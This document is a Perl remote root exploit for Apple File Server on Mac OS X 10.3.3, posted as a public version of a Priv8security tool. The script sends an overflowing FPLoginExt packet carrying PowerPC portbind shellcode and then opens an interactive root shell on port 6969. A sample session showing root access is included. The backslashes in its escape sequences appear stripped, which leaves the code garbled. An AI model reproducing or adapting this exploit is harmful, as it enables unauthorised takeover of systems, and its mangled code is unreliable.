信息来源:hk20
#!/usr/bin/perl
# Priv8security.com remote root exploit for AppleFileServer.
# PUBLIC VERSION!!!!
#
# Bug found by Dave G. and Dino Dai Zovi.
# URL:
http://www.atstake.com/research/advisories/2004/a050304-1.txt
#
# [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0
# -=[Priv8security.com Apple File Server remote root exploit!]=-
#
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
#
# ****** Welcome to 'Adriano-Limas-Computer' ******
#
# Darwin Adriano-Limas-Computer.local 7.3.1 Darwin Kernel Version 7.3.1: Mon Mar
# 22 21:48:41 PST 2004; root:xnu/xnu-517.4.12.obj~2/RELEASE_PPC Power Macintosh powerpc
# uid=0(root) gid=0(wheel) groups=0(wheel), 1(daemon), 2(kmem), 3(sys), 4(tty),
# 5(operator), 20(staff), 31(guest), 80(admin)
#
##########################################################################################
use IO::Socket;
use Getopt::Std; getopts('h:t:p:o:', %args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'t'})) { $target = $args{'t'}; }
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
if (defined($args{'o'})) { $offset = $args{'o'}; }else{$offset = 0;}
my @targets = (
# description, ret, Magic size.
["MacOSX 10.3.3", 0xf0101cb0, 4], #tested on my ibook g4
);
print STDERR "-=[Priv8security.com Apple File Server remote root exploit!]=-nn";
if (!defined($host) || !defined($target)) {
Usage();
}
($desc,$ret,$msize) = @{$targets[$target]};
print STDERR "[+] Using target: $descn";
print STDERR "[+] Using ret: 0x" . sprintf('%lx', $ret + $offset) . "n";
$shellcode = # portbind shellcode by br00t [at] blueyonder.co.uk
"x7cxa5x2ax79x40x82xffxfdx7dx68x02xa6x3bxebx01x70".
"x39x80x01x70x3bxdfxffx88x7cxbex29xaex3bxdfxffx89".
"x7cxbex29xaex3bxdfxffx8ax7cxbex29xaex3bxdfxffx8b".
"x7cxbex29xaex38x6cxfex92x38x8cxfex91x38xacxfex96".
"x38x0cxfexf1x44xffxffx02x60x60x60x60x7cx67x1bx78".
"x38x9fxffx84x38xacxfexa0x38x0cxfexf8x44xffxffx02".
"x60x60x60x60x7cxe3x3bx78x38x8cxfex91x38x0cxfexfa".
"x44xffxffx02x60x60x60x60x7cxe3x3bx78x38x8cxfex90".
"x38xacxfex90x38x0cxfexaex44xffxffx02x60x60x60x60".
"x38x8cxfex90x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x8cxfex91x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x8cxfex92x38x0cxfexeax44xffxffx02x60x60x60x60".
"x38x0cxfex92x44xffxffx02x60x60x60x60x39x1fxffx83".
"x7cxa8x29xaex38x7fxffx7cx90x61xffxf8x90xa1xffxfc".
"x38x81xffxf8x38x0cxfexcbx44xffxffx02x41x41x41x41".
"x41x41x41x41x2fx62x69x6ex2fx73x68x58xffx02x1bx39".
"x41x41x41x41";
$bin_ret = reverse(pack('l', ($ret + $offset)));
$buffer = "x60" x 141;
$buffer .= $bin_ret;
$buffer .= "x60" x (824 - length($shellcode));
$buffer .= $shellcode;
$buffer .= "A" x 100;
$req =
"x00x04".# Request Opensession
"x7ax69x00x00x00x00x00x00x00x00x00x00x00x00";
$packet =
"x00". # Request
"x02". # Command
"x7ax69".# leet ID
"x00x00x00x00".# Data Offset
"x00x00x04x00".# Length
"x00x00x00x00".# Reserved
"x3f". # FPloginext
"x00". # Pad
"x00x00". # Flags
"x0ex41x46x50x56x65x72x73x69x6fx6ex20x32x2ex31".# Version
"x10x43x6cx65x61x72x74x78x74x20x70x61x73x73x77x72x64". # UAM
"x03". # Type
"x00x07". # User Len
"x41x64x72x69x61x6ex6f" .# AFPNAME USER
"x03". # Pathtype
"x80xff". # Path Len
$buffer. # Evil String
"x00"; # Pad
$len = reverse(pack("S", $msize));
substr($packet, 63 , 2, $len);
$f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>$port)
or die "[-] Cant connect: $!nn";
print STDERR "[+] Sending Request Opensession... ";
$f->send($req);
print STDERR "DOne!n";
$f->recv($crap,128);
if($crap){
print STDERR "[+] Got response packet:n";
parse_packet($crap);
}
print STDERR "[+] Sending FPloginEXT packet... ";
$f->send($packet);
print STDERR "DOne!n";
print STDERR "[+] Waiting... ";
sleep(5);
$sc = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$host,PeerPort=>6969,Type=>SOCK_STREAM,Reuse=>1)
or die "No luck :( $!nn";
print "We got in =)n";
$sc->autoflush(1);
sleep(2);
print $sc "echo;echo "****** Welcome to '`hostname -s`' ******"n";
print $sc "echo;uname -a;id;echon";
die "cant fork: $!" unless defined($pid = fork());
if ($pid) {
while(defined ($line = <$sc>)) {
print STDOUT $line;
}
kill("TERM", $pid);
}
else
{
while(defined ($line = <STDIN>)) {
print $sc $line;
}
}
close($sc);
print "Good bye!!n";
sub parse_packet
{
my ($buf) = shift @_;
my (@packet);
my ($i);
for ($i=0;$i<length($buf);$i++)
{
push(@packet, substr($buf, $i, 1));
}
my ($flags) = unpack("C", @packet[0]);
my ($cmd) = unpack("C", @packet[1]);
my ($request_id) = unpack("n", @packet[2] . @packet[3]);
print " Flags: $flags Cmd: $cmd ID: $request_idn";
}
sub Usage {
print STDERR "Options:
-h Victim ip.
-t Target number from list.
-p Port to attack.
-o Offset, try in steps of 500.nn";
print STDERR "Targets:n";
for($i=0; $i < @targets; $i++){
($dd) = @{$targets[$i]};
print STDERR " $i - $ddn";
}
print STDERR "nUsage: perl $0 -h Victim -t targetnn";
exit;
}
